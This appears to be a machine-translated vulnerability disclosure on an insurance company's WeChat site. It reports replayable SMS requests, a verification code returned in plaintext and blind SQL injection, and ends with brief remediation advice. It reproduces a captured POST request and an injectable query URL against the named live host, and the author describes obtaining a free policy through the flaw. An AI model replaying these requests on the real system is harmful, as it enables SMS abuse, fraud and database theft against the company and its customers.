A sub-site of jixiang life (logical error, sensitive information leakage, SQL injection) vulnerability Packaging
Auspicious Life Insurance System
Http://weixin.jxlife.com.cn/jxlife/jsp/traffic_mobile_index.jsp? FromUserName =
Question 1 # packet capture and replay can be used to send arbitrary messages
POST http://weixin.jxlife.com.cn/jxlife/jsp/getPhoneCode HTTP/1.1 Accept: application/json, text/javascript, */*; q = 0.01Content-Type: application/x-www-form-urlencoded; charset = UTF-8X-Requested-With: XMLHttpRequestReferer: http://weixin.jxlife.com.cn/jxlife/jsp/traffic_mobile_index.jsp? FromUserName = Accept-Language: zh-cnAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Host: weixin.jxlife.com. cnContent-Length: 22 Connection: Keep-AlivePragma: no-cacheCookie: 229667067 = 0; JSESSIONID = response; CNZZDATA1254189807 = response-% 7C1436270012AppntPhone = the phone number you specified
In about one minute, I used replay to send 11 messages to myself. Of course, there are more.
2 # system design defects. The text message verification code is directly returned to the user in plaintext, resulting in any risk.
I got a free insurance for myself with the 13888888888 number.
3 # SQL Injection
http://weixin.jxlife.com.cn/jxlife/jsp/trafficDetailQuery.page?ContNo=900004299434&way=&QAppntIDNo=110101198808085638&QAppntPhone=13888888888
Parameter: ContNo (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause
Table LRPOL
Time relationship, not one by one, slow
Solution:
SQL Injection: modify the program and query parameters.
Arbitrary text message sending: the background program determines the number of sent messages and the interval, and adds a blacklist.
Delete the front-end Verification Code Return Value